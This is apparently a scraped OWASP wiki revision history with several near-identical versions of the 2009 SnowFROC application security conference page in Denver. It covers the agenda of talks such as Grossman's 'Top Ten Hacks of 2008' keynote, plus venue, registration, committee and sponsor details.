The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.<br />
<br />
==The Speaker: Jeremiah Grossman==<br />
Jeremiah Grossman is the founder and CTO of WhiteHat Security. He is considered a world-renowned expert in Web security, is a co- founder of the Web Application Security Consortium, and was named to InfoWorld's Top 25 CTOs for 2007. Grossman is a frequent speaker at industry events including the Black Hat Briefings, RSA, CSI, HiTB, OWASP, ISSA, and a number of large universities. He has authored dozens of articles and white papers; is credited with the discovery of many cutting-edge attack and defensive techniques and is a co-author of XSS Attacks. Grossman is often quoted in the the business and technical press. Prior to WhiteHat, Grossman was an information security officer at Yahoo! <br />
<br />
<br />
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=SnowFROC_Abstract_Grossman&diff=54891SnowFROC Abstract Grossman2009-02-18T17:59:54Z<p>Eduprey: /* The Presentation: "Top Ten Hacks of 2008: What's possible, not probable" */</p>
<hr />
<div>==The Presentation: "Top Ten Hacks of 2008: What's possible, not probable"==<br />
<br />
Top Ten Web Hacking Techniques of 2008:<br />
"What's possible, not probable"<br />
<br />
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.<br />
<br />
==The Speaker: Jeremiah Grossman==<br />
Jeremiah Grossman is the founder and CTO of WhiteHat Security. He is considered a world-renowned expert in Web security, is a co- founder of the Web Application Security Consortium, and was named to InfoWorld's Top 25 CTOs for 2007. Grossman is a frequent speaker at industry events including the Black Hat Briefings, RSA, CSI, HiTB, OWASP, ISSA, and a number of large universities. He has authored dozens of articles and white papers; is credited with the discovery of many cutting-edge attack and defensive techniques and is a co-author of XSS Attacks. Grossman is often quoted in the the business and technical press. Prior to WhiteHat, Grossman was an information security officer at Yahoo! <br />
<br />
<br />
[[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|back to Presentation Agenda]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54199Front Range OWASP Conference 20092009-02-13T18:32:31Z<p>Eduprey: /* Agenda and Presentations: 5 March 2009 */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"The Top Ten Hacks of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter the stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54198Front Range OWASP Conference 20092009-02-13T18:32:11Z<p>Eduprey: /* Agenda and Presentations: 5 March 2009 */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"The Top Ten Hacks of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter the stupid"]]<br />
''David Byrne & Charles Henderson Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54197Front Range OWASP Conference 20092009-02-13T18:30:32Z<p>Eduprey: /* Agenda and Presentations: 5 March 2009 */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"The Top Ten Hacks of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | "Adobe Flex, AMF 3 and BlazeDS: An Assessment" (Tool Release!) <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter the stupid"]]<br />
''David Byrne, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP negotiated discounted rates at one or more hotels near the conference venue. Please email snowfroc@owasp.org for questions regarding accomodation.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=54196Front Range OWASP Conference 20092009-02-13T18:30:04Z<p>Eduprey: /* Agenda and Presentations: 5 March 2009 */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
